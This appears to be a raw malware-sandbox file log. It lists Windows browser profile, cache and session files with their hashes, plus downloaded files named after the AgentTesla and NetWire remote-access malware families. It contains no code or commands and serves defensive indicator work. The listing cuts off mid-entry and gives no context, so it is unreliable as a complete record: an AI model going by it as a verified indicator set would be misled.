| SHA256 | b41e2353778e9e9f831cb6490f9a9ecd40aa44a4a0d7fd2557ce803b3fa9d933 |
| SHA512 | 51a53deeb29ba7b3da8587ae7022ae9f2570a4b53a6c82a09ab65f844f4411d55c77b90aebf70147a9be0a5fd06daf05ca735b7ec0a6afad753e41749a4a12a1 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\FF405EA908A0CDBF948198368567C7EC073C7A02
| MD5 | 533a1522b23b488b4ada26461f589e11 |
| SHA1 | c99ce469c8ecc8d903b00e910d2d64d273c0ebd8 |
| SHA256 | ae800ebaa7d6ce82b5d652b64bcfa33aaca7c914787b272559c76d8304233dee |
| SHA512 | f1fd35c564d820c28312ca321712477b858fc0e77d89e394b0ada6e2ed2126946e4dc2b66d5e562342bf01f69f18a0109e5991caad98b557628b6045a2c075e8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\7F30F53457983F11F2D61636C9FB5706ED9AB60D
| MD5 | d2367cd955e479a5e7f295691f29101c |
| SHA1 | 99904136a3e50c7b04835019d94bf2ad3cac9daf |
| SHA256 | 1fe27b3567e726cc19176fa8e2027e201bab41e991f90dfe98c830f9eb3bd47b |
| SHA512 | e6f17bdea1b78d742af46f1fe4c6a23222bc8ecb5612f4debb7ed856f826a4d686bbb01cc554211b3fe6746039958d41f4d8a0fd1c96ebe57ac2d936ddeff5d0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | d981279dbc7b430c3c9847a0728a84f9 |
| SHA1 | 2525c566fd25f54da624e6ea7c7f9f471dc1d50f |
| SHA256 | 0c8d049a165d309e873e80e3a73800e183edc38d6f397d538e9eee0b1f860acb |
| SHA512 | c47ea8c7d6357be8dbe7e2d894db436f3c1bb63fad2edfdd1b6aab24f4fafb53dca4d79b3dcfff13a0109e18229b506743650b80088f6c71e8ae130f19ab6957 |
C:\Users\Admin\Downloads\AgentTesla.2GGOXG6D.exe.part
| MD5 | cce284cab135d9c0a2a64a7caec09107 |
| SHA1 | e4b8f4b6cab18b9748f83e9fffd275ef5276199e |
| SHA256 | 18aab0e981eee9e4ef8e15d4b003b14b3a1b0bfb7233fade8ee4b6a22a5abbb9 |
| SHA512 | c45d021295871447ce60250ff9cbeba2b2a16a23371530da077d6235cfe5005f10fa228071542df3621462d913ad2f58236dc0c0cb390779eef86a10bba8429f |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\jumpListCache\Vo4+odcdVjjrt6dyqh+_g9WqprtmHhqR6aJf5Bg29Qg=.ico
| MD5 | 6b120367fa9e50d6f91f30601ee58bb3 |
| SHA1 | 9a32726e2496f78ef54f91954836b31b9a0faa50 |
| SHA256 | 92c62d192e956e966fd01a0c1f721d241b9b6f256b308a2be06187a7b925f9e0 |
| SHA512 | c8d55a2c10a2ef484dedded911b8f3c2f5ecb996be6f6f425c5bd4b4f53eb620a2baccd48bac1915a81da9a792971d95ff36c3f216075d93e5fd7a462ecd784f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | f642bb5b973829d90b217c852e900ca8 |
| SHA1 | dd56c986bdd1d6f5b1cb4a18de1997caf57c560f |
| SHA256 | d126f738f152bf880aa7b81223bb36ac87fc35e15c32c47d83992314bd8f3ecf |
| SHA512 | 3b2bee3ef0213cfc8a21114ab47c3b588bc214a093f7ec30ee07031efa03e82090cd698f98c60afb8c4f5a79c854a885a092654d23499c868cda2241fb86cd0a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | b9e52dfece106e6b0d81eb0c1f5c1d2c |
| SHA1 | 34fbcd14ae83b0f4b63c35d038b68735e2cd1b5a |
| SHA256 | 39ff741adcdb974db9b2cd76b3719d88010e367a9b26a9bbbb383d2f75138a8c |
| SHA512 | d211fc325143c7958ec6798a8ffe697f0e962f53c8895472453f381e0c3663d33b36b558a4b3599eac89d4918ef6613353ace7ea32ac4325f8687402a52cbd47 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\2947b088-2e5f-4ea5-93a7-7978ed93975d
| MD5 | 0b3f73f46b8fc71fde9bcc16b5dfb820 |
| SHA1 | 9154a3c7a519774dd21ed23c4077aeb28b3d175a |
| SHA256 | 3e9d8c44f66dcc8e95d59768f4b2c4df0c1d62d21ac79ae89a48ef9a316b9f03 |
| SHA512 | ef794cb7cb1d6312908eb0cd5946e3fd3162bbed589b091b6dd92191a03e3a217376f4d61e74d2e362f5aa5ddbf8be5233bd6dbab09d362d6d5b543314d57a03 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20S9BD1SOIUWJ2MFGIJF.temp
| MD5 | 4c5325eb3a6679252027c5d375b61bab |
| SHA1 | a7cfb41ecd666a4fd9103ca837530b1ca914c5c5 |
| SHA256 | 14fa0f659ca52eb32214bad4a10b1e92c8315ebe5fbf0bd9ad8512a7e4cc20db |
| SHA512 | 025a31ebb211fb501722df179ab72686431091ef3d1292981da4822203391a1c7735a5c6f1f0b8c4dd018fa27abda2c8f01df4f982c809fe7326882516136215 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | e9dfcf63493773d99e736b952c40b283 |
| SHA1 | b27cff30f6b711cbcacddaeb61ed1fff6dfc04ae |
| SHA256 | ae6d5a444b4538799f2bcb7d96012a31ad74fc12ef08e0a5cb7d033fa068ff12 |
| SHA512 | df8ac869eb51c2fbf6e843e63a84a3dfedb62aeb28c1e8baa3cc241f1749512d7c4298dc5747c417dfa50ea0e63978db6a78410bdaccaa6e3f77524b121973bd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\AF6E7B7DB9908D7B867517AC33D094ABD56E38F7
| MD5 | de80ecf8975bdb3fb4cf3cfb69f9567d |
| SHA1 | af9b20d84a2d80f326b9511d6ebedd5557d88384 |
| SHA256 | 65ed782c670c6936204a3b24f3f9e18b87032932a9e9150ef585babfc763e5c4 |
| SHA512 | e674f9c3de4bbf8606bb34cdc8e03a9983226e576a3c069296483c5f426d0b6350e0803377603de5e2ad869d2e1068601b1855776f4b57ed30f9b3fd3a38ed97 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\6DA69A746F9687E1FF413119EDE7AAED2F9783B9
| MD5 | 43940c8e9e6163cad86eef7746c9192c |
| SHA1 | 40c750b31c351fef5abb85df409dbd6b4d108263 |
| SHA256 | 6ad7cb998a23ecc311ca0d324b57c9d44aebbf97d56e8e80ccaae7edb23b2933 |
| SHA512 | 3765e870879f562d74ccc7c8f900976b07a6ab7c6a76346f935d214c171951843245ea49c780d790a8d51b9b9affbc0bba414e1fb1145b4ad10a5e425a98db57 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\2492994A253B970917AF5CDF605580B1C2DC16A0
| MD5 | 331b4c1fde8d0fb8e19c214f7c474123 |
| SHA1 | 56115ba7165959e34a4fe359997a7dfc268c2325 |
| SHA256 | 27f2b2c010a94f141160b55f1af6f54bde4d0b8bb0d233cbc37d35295fee4c48 |
| SHA512 | b501c8097b819516897150f599e8557e17009d050a429af07b41da6f2e04d0823108b21d6b43b16d4ea861079e6962181f349265581fcc079dc7252710222446 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\E6C22A3DFCD18E3C6145370266896FF76AE3F7EC
| MD5 | 4d0439fe1b1650731fdd6b09eb2450af |
| SHA1 | bd2fa3682fbf633bf7badbb898ccdaecbcc5bb5e |
| SHA256 | a6b3001a8f48b37236414f1b5ef99960884b0727b9e56f9e8efeba084952ee3b |
| SHA512 | 233e7894ad7e319eb190c9620577f48cb42513ac2d67380b6bdec6e17471824fe80bfca3876d45ef62faec0df7b2e65f825d83d62b11304c12e5a4e7af755a74 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\3B5769283C179770F2CAA780FDC2929B4B9E5038
| MD5 | c521d9f4da86923a2930a3dbc929395e |
| SHA1 | dc067da5a4570dae14a6fd1b1151ea155ad21d21 |
| SHA256 | 4365975fdd273fdf920930887415b80949a0796818b7743401d372458dfa03f3 |
| SHA512 | f19ea4ea26e809aaa7691b138069ad73e630aa6caa510b1d17f9ef14b6f9b96f7d802840ca98b6a1fd2602ebbcc4272649fde4898c291206cda78ef5879a28e7 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\878D57D194D36A5530D4BB67461357E393C85A3D
| MD5 | 9c1db5ffce137e917bfcca5b15d4aea3 |
| SHA1 | b26a263a6f4448b28a6946878b07718388296706 |
| SHA256 | 81dadb6e6518ed5d970c3d85e676cbac491151542d38484c3d0fefa0cd45cb52 |
| SHA512 | 8db3141056796361305d0852b1ba00e9d2de820d45269d1eb3f76270dec358b92e1e1589664d8389becf6343d63de0c242a686566f34cb09bb376d3f894b5870 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\572F0ED336AE2650801061B8F31BB2D7362D6B9E
| MD5 | 6cc008b8347ebb29db965d3caf05abba |
| SHA1 | e0983a93aec94b513068b9e97daf63da8b98a56a |
| SHA256 | eba23a44a3099d2a96f7e9483253378ed56312c417026791409154f13e9c67a2 |
| SHA512 | 7fecda9ae065f8d71812d36a665f384303d601f31dc0f3cd68f9797c99ac65ed159b92a069a10016b66e38e559da46c14285bf7f751dc797529dacf853e25b4d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\A6C74BC2260EAFF823C7AED38BBA607C962CCB55
| MD5 | 3bf2d51587eb353a2154a93a8e1e42da |
| SHA1 | d93877f96537284f234b24b1d4e228bece546664 |
| SHA256 | 2ed994072dfe3a1ed14747ac94c9b4fef43553e495f79d401e8c83505f177962 |
| SHA512 | 4cb3e3444a4cb1e48ae20e71e0280045ce9956333fb8fd33cc826127926d81f6abe815b90e5fc092e717353bd25d47372e4f65dea149c822b423c305b5489a46 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\E2E8122A6253CFFA077D0D33D689966608450980
| MD5 | 00ee0c4b9592518f57ddf7fe370541b5 |
| SHA1 | 11313e4b565022978759980156c024d1e73f08e8 |
| SHA256 | 09057cedcecdae0d15ee4b230b5629c8ca2ab39a1f15633dd10e6431e3c92373 |
| SHA512 | 47fb5cf67292d0a94c9c649e6e28e43807c121ae8efa25dae2f2218e8fe1ca6a43f3ad0bec7bbc5c3ce3d6ad1195ff90ab6d9828ec1ee502ea43696f6ea227e2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\C3C1B73261AC1D76E896892B7C9776351D4E38E4
| MD5 | d626393f4e11c83b63101d13b367b782 |
| SHA1 | 9836b4cd8e7b2f39875d18a3ea709e6c2891fc7c |
| SHA256 | 53cfd6ac067e68ee38738a21b5e283df1201722ea604b0d89a5ce12e6352ee05 |
| SHA512 | 6bbdd9ade5a3e92352458457073ae4e6245ce4880043e7db8d431463cf1de4f51411f765e026a64e1cf9c11c16c26e980220caf1a9910fc3c2629b1631ca4357 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\4CA2E679CEC293F142684E37B6B4D5F01FB00E81
| MD5 | cc302fda65dcf417d2da68ef23d5fba1 |
| SHA1 | 1f065c15573e8a44c122c9ef1eda7c2613bce79f |
| SHA256 | ddb8afab9cf4edc242f1a556bc3d65994ea2c7683008273bdb0ee7e1bbe6d1ea |
| SHA512 | b6adbde19e0c33efd962a0f731bd4127e93e229612b423c33aa7b76f1c45b49ae58bc28fc041d39edc562af4b93984e588d5a8d5d2b16cafea952632ae41c89c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\A7BFD7F859FEEF756C6ADAE32A931308CD5C619D
| MD5 | 250ca30074d74e72b9e997eec9b0c2c0 |
| SHA1 | 9cafd2254a6f9e6a4479ee6c00aa1d7667bc27f4 |
| SHA256 | e39864ee56dbf02bfa22a35d0e3f45cb5058c0fad1ff3b725cd651f0b9d2f711 |
| SHA512 | b8c57dab8e953032b1a54b955882350f1d344358b00e38a94af2f755c43aafe396508cf729b09fc3265bec77d42744383edb55521bf4d4a2a79a34441c9db227 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 8626ef191073380e181f86b1017ff83c |
| SHA1 | fab8cd0fbb60af9028e93190df68304c59332eb5 |
| SHA256 | 96fe4b64d00a7fcfab5312fa27fa22551d30db3d32f4c8ab6eefe8ad1f087c13 |
| SHA512 | 80d9e0250f6b316fdfd8ac69fd2454507bc32494340140eb2a1dd1bc3782ddf54a39eb0a620aa2306177c072ca7079736d50da819cac9797dac8df7460c8b280 |
C:\Users\Admin\Downloads\NetWire.Dy-8M1Cj.exe.part
| MD5 | 7621f79a7f66c25ad6c636d5248abeb9 |
| SHA1 | 98304e41f82c3aee82213a286abdee9abf79bcce |
| SHA256 | 086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d |
| SHA512 | 59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | bee67512892d25c2327c59d5e79565e5 |
| SHA1 | 0f3f8deab3464d89ac8c528bd057ac34f4fe1afa |
| SHA256 | a5e71074b36fef07b768047291d37b1c42144558a5c70dc77216411d33b2092f |
| SHA512 | 88004fa4a233ad4c3583efe96e9cac22eaacbb7908843dfb0e62bf2b1d3136d40635f5c734db1aa0324d7e96f9f33f8dafe740bdc05240a3840c1e14279f387c |
memory/4136-1708-0x00000000006B0000-0x00000000006B1000-memory.dmp
memory/4136-1707-0x00000000001F0000-0x00000000001F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36f14c6d84591a1b011119ea272806ac |
| SHA1 | eafd311b2466e7e5550bfc99338bebbafb97e44e |
| SHA256 | a843b7834bd9c5ecddbaca0e7e59b1dbe87bdcfef205fc612a436c8d30281046 |
| SHA512 | 30c3167bed3aa166706f38d99a8e9eb803c308f7f67d744cb0a7773b656020b8a90735e18daa34a8de055cce53064f83fb9291fb4bc8e6ed1501a2bf69b73e44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | 74705e5ff4b1cda01be29788105e9d8e |
| SHA1 | 81af9049e3e9ed725cf56a00e144c85a1ada2e61 |
| SHA256 | c843703e7844280f76a983f66d61138efbeb1a31d05cc60c56a9c6405285da5a |
| SHA512 | 9ba031d148581fc6bb8bbe26cd6cd80cda5378249819f339e0b93beb4e2216210d55e89d42f08feda02697a97285f37284b25683d44d09b8b5932775a07dcaf1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | b38c067b214122dcd0a5f78543d35b3a |
| SHA1 | 7515a34e29f424f5ae90e79b4073962b0fe7b93d |
| SHA256 | a953879dbdbec29f61256e03dcaf6190a79d2c71828d3d3a8e573e59dcc03d86 |
| SHA512 | 726131a4aa212df6b39cc8b0644c0b602e8c57e662937ddb003e3ac62e42797dc898029111d7b149f592faf88b7eb98f84fa832a596f48c975558d786cd9b5ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13369781097354065
| MD5 | adf65232fedc445f47b91ba99a88b765 |
| SHA1 | 47d87004b72d0bbe966b72f4d7d563c0545eda9d |
| SHA256 | f682ab24704e1bdfb057cbeaa100aacf273f3eeefca34899605e2fb14df64de4 |
| SHA512 | 83f2a89fa26771ec9ebf06413961d94a406fe49bb4b72e039774d43a4cf92f9fe86f0b6b611884f20ce82cfe951629213febcf5ea172961d862f3ce84c966ca4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 31c26a7966b70b621010abee1fd966ba |
| SHA1 | 8a59b6b698cd38c8022a344e1e03f6cb4e9df3d8 |
| SHA256 | 5f3270c5a262c56262ea22e5b70fe7bd897f8d7a1c8c3a2615336085fe43d16b |
| SHA512 | 05469bdb2fabb3b9fb6cf9b64306f4f048045e06c2aefb426f5392b90c7cbd37824ef7e6389defca1cd082fe382a9916e453ce4d34e30adbbee104ef30cc12eb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 6f0d7b9cd614ff31282b19a6df0c9f00 |
| SHA1 | 67e1dca4eef4ab63ae3aae3063f41366b5fee194 |
| SHA256 | ff6210614471d2db328ae6112f86789f2df0de510f083a1c79cc6a14415e3376 |
| SHA512 | e044ce687ffb6675fd9fbdb461036fdcd1580539ff0b79d76b9edab9ba788f95afd8e14021872ef269b2e7d1c22e4c88845217285f86e7248269bfbc0e766798 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | dc5b0c0b2d9b0387e8e8a0997c5f9b4b |
| SHA1 | 61b579bd89f249f788e3f1c3f0dfd8687f4f1707 |
| SHA256 | 9f28e468ccf0a835598e2bb88f7c5fa802de863fc3c938b5a9ea2ea4f673145b |
| SHA512 | 3decffbd422957324be4228c6c711c2bd37c08e99501ce1c4d5e40e1cca65d5ca093fed46763404ff08ada24df6d2ae6481812ec4e551282305278e570c82cbb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 74838bb5887a2a24e85c50e3b6c901eb |
| SHA1 | 7f7b351d1423ea000d68c8bc312a7ee01b0cde86 |
| SHA256 | c3fa5355a2bb5bdb792d099d3e3395da3c6f2c1fb657c402ff7be7bab0a3d223 |
| SHA512 | 544594665ea2da364f5ac4dcafeec536b5583be7b9b921c7f9c430aa5ad2600ce4143792e6e9a4e5230ea2aa250a74faca2cdabbc2dd2dc3bfafb819834a109e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | 9085a547ceceec1e930593cdbeec2368 |
| SHA1 | f0a5e13be297236e264b2623215212ef5459765c |
| SHA256 | dc28e599a508e7b37294fd065189b4294e4de58bdfcf6c439ad2ea0801db7174 |
| SHA512 | 9af13aa4249e04b74d2f94aec2cee3bdd478b2fe4d11391d674cd74d2d3e35b410127e1c57f164412a382ea2ea65aab7c624e7f3c18ef1ffceaa7ce186af415a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | d4217239538faed06ce59c69c876931f |
| SHA1 | 4607f6e8ffd4a97f3509467d31c371e5928a27b9 |
| SHA256 | b7eff619f694de950fe92e8739c129db57483eb8d2c812948013978df7d41fbe |
| SHA512 | 9a2efaa988a65b0537df29d979a5806041806b52ed988b597198a43077d2283acfac3c52b4c892953186eca740f0fec9429b85c6fd0d94b2c588fbec7b139414 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | bdaf197e87a1196b6939db13ae160f69 |
| SHA1 | 4e21a08d33d4e5499ebe5a7456c8d9049798bb29 |
| SHA256 | cda7e220f03ac2fc61da28fd180a9c0462733a4fd3076de4fc05a6f8fb0a04f6 |
| SHA512 | e49ae164bba5f0bf5aeb4be3e58033e52fbc19f7e11bb33fc32799e5f08094b45df5d282415ba7eaedaeccbca4f99f2b3d86f8fcd078b868ef427ebc164e7e0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 9f77123d34918a600b63a3864bd05445 |
| SHA1 | 8aa21fe349c51fe8cb4202ff4188c951949f9bcd |
| SHA256 | 844e4ddc1bd85923671e94206001837d7883cd3ea7042c8d2dee4498e7bbf878 |
| SHA512 | 702dc8a58fe075d9f6d49ba5d825aa8c6a7b2131e606548560514761ed1e288e3a618ea4f5ffa3fbcbc63eba3d7fc317c5d073e13af087bd74a2aed486b8c48d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | a48763b50473dbd0a0922258703d673e |
| SHA1 | 5a3572629bcdf5586d79823b6ddbf3d9736aa251 |
| SHA256 | 9bb14ea03c24f4c3543b22a8b4e9d306b926d4950cfcc410808ecac2407409fd |
| SHA512 | 536406435e35f8204ce6d3b64850ffb656813aacbc5172af895c16c4f183005d69999c4f48f948875d9837890f290b51a7358ff974fb1efc6ba3d1592426cca1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 84ab273a45ad3de544d8a3168bc2a3f7 |
| SHA1 | 19d3fd43c79bbcfd99087c4001ca109d76416459 |
| SHA256 | 0073b36db72c9c52f98d923206fb2d2d4c85811b88fcfb51477d2261f309036b |
| SHA512 | 167cfa1a82a3f56002d2cb3de1c085b024c7ad3f4ad363ac3f9901a4c39d102df5f6df10d17345f9b62edd906a2d874056a84cf3cb8aa98248b4469b50fad111 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
| MD5 | ff12f922900306103efcbf60b9b5ce38 |
| SHA1 | 9c1d4a663f377e6298ed26fc2d2c755076f3b130 |
| SHA256 | 3be4effe393370aa267a4ca068c0206f529b34690079dec5a5959037ab0ed8a2 |
| SHA512 | 302855dfcc098cb6cc6aaac7db9954f3e09af307f69658bd48a03cbeab01e3df81600787300c8d966c8b21553e1a833550c2ae13e60376a62c7b541198efd21d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
| MD5 | 3edc820a2a762b4194a0420d6025404f |
| SHA1 | 0df4352a9f7057e1156a91f5e87ef8a8101b54a9 |
| SHA256 | aff22690e8b806a912303843914e231279848c8130865ac9c0af0557ee08cf29 |
| SHA512 | 83c0e869ffdf2bf6cdb1cd9c5b5cf76314fbe6b7d17cad8ec6219b16bbe7b89e4edd9d39ae6bd456996feebd04b74e3f798c742889fc03e26bdf0103992e1f08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | e5d3dbc42901d9fcbfc877dcf1161941 |
| SHA1 | 17c05939bfdf1f3da5cbe1740c5f0fb955267f13 |
| SHA256 | d9bffcfe62046ea035e738aff25bee4da0f52cf25df22996cb4deb742a5a47f3 |
| SHA512 | a3ba36b03a135c8baaa9568f8ec6f0fb08c10c8a0ba82265cea3df5705baafdc83d7acec8fece1aa70d74b1ba81b4586fd0dc2d482a6892a3018d469e984f48c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | d8687026cb8b9e207e35e80686593d70 |
| SHA1 | db14958caf21eb8ff421a43dadf0d8590c2b3e09 |
| SHA256 | 984e0e8b2ff6b9c3f8d28d3e139d1c01b2986235c2af0dfa4afbe279e4ccb2f8 |
| SHA512 | 58b20dbb39b39976657cfd20d1a02b590727afb4dba969acaea68423fa79adf7d18d4941b51c24e7230e0cbbdea845089c1efc7d0137f8c9ada46805d0946b87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | a55901dd8dfaa9b8168ab67510e8fff1 |
| SHA1 | 305d79008b89437697d6ae9e53b002f2919d0da3 |
| SHA256 | ec41b1a26c7ff7712fc566e5a9bba6d632be2d7748f9898b26b4d794b8d3769d |
| SHA512 | e90bdaa843ab16d2c95304db36527fb21b163af574df28b16c7a8309c179dda638a91934c969c40e35042bb9d8fac3b78a15a08dd384c1c9dd1934e6aa50028c |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
| MD5 | 2e9ca1e942d4dba19b61b1fc40341077 |
| SHA1 | da1d3dcec06c4ad00e10b4c996b962aa41c44e77 |
| SHA256 | 732c30614c0d77445a5c96aea80a2ca534c66147696806a86c409e1cf2a998f0 |
| SHA512 | 3b6aa465c89ffdde0136f62ece4cca36fd50a35b69bb0b5d5f8ddb04c6e4271331d70d490a1ab2a9a46f7844ff23231f4c8a3c9d1e052258409199be57233cbe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | ff815d07a20ce2c27d0fc8e4a899d895 |
| SHA1 | bad6ffdebe7bdfadefa6a070e819d70d2c514ed2 |
| SHA256 | 5e070200a6756ae3bcb42c48a6f9b4b7605206ded00bcb3b747b085e0ebd4f96 |
| SHA512 | 35929cad8f297e1d891275727cb0245f321d62ba0465584e22bb47ce7958f07e8b013ce0415ab665da2cfeecec582000d24071205ba49e77e6c9fe3e649c6d00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | 5d2bdd74dd3c6a1185e6ee6ed37bcdbe |
| SHA1 | a8b097b43ccc1519fa85bb56ddd44319add1247f |
| SHA256 | 0ff99b1fc705985adfce3140a2acac602111e1770b5c944383e6bb278b0ab131 |
| SHA512 | 30320cc6ad60c373fd050bcd584875562c8d46561e4b96608bea760a38d14a6379c9c65f36469f105877fba91867444a2aca46ab5b7d4a142d2cdf3ee84b8554 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e437443e33401530fd2bb2a6d4d1cfcc |
| SHA1 | 2b747ff379fc0fdf9e69e57f3a22a24aa045309b |
| SHA256 | 26510431bbe1fe82874e64fcc47d54c4913aefb195af655777d52c0fa8cd73a7 |
| SHA512 | 60df58eff881a528951840023eda13ab105e44a4803da46f7907d76cffebc9afa366b09e8b3d4bef9bab08cbdbb1ff1f16e0de5c879a2c313c6e4a6e657c2fc7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 78fb09d2d0848d3f80cba3662f97c728 |
| SHA1 | cc2f3f93cdae9bbb49687eba6e47a7b0391f332b |
| SHA256 | 7d67e0907be6d7aa656046e2ad87f83f7f45ab509cd388ea8427561d65d8b5ec |
| SHA512 | 7dd00b186940fece14fa0e1da3136edc56f0aeb95ed550dc4b50943845921b5553f752884b8324a6475de8511bea0fd549cf48a126f2dd729af9ac4976810842 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
| MD5 | 5c9e400732af2d78844ddf62582c31fb |
| SHA1 | 064f566a5e4565e0b2a0103bb57761306b4bd2bf |
| SHA256 | ace4d063892b9d9e89366a58883647247f6ba3879236f050c689e9e2a353c407 |
| SHA512 | 07f6643eea48a0bfbafeefbd9fec4a40348c4d1c434c11d2772470ddbba6ca7f5244150ef15b0bcbd646421ada21f32ee8db0e983d4ab6068c682de5e20388b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | dbe46f82a661d0ad699e8e7e742e72ee |
| SHA1 | 4dde6bc2ec575d4411eaf2fc19a13597f3cdfe87 |
| SHA256 | a9613834feb68bc16aee4ec20a98adbc19aef47e94d3af5409203cf965dc003d |
| SHA512 | a1557deb1a906a2d82b0d821fb6a777cbba9ba87b4ca240dff8bd24aa5685d22b47b06810a103c7587e23183e985b7c5b1f83ab55fd417017da361530e69f305 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL
| MD5 | 59896fd7ceb2d0b3d30236213c84de48 |
| SHA1 | ab4d5da50ae0049ffe8a0a4dca7f1b4f1f29798d |
| SHA256 | 050e86e81a1a96a02fba4179f26e02170395a109038f4199add3e1383f9310bd |
| SHA512 | ddff25e936077c0ace8d44da03831cd124d29e1673a9d61854559f4585066a47bc99980f61289eb826cf691bad64e88b00c951b4cd3b20f0d3bcd23cfa918431 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
| MD5 | 58aa3847aa926172fc4c1799c932bc69 |
| SHA1 | 90a876b4ce36e6f3da32405ae0d3587f47abbe3a |
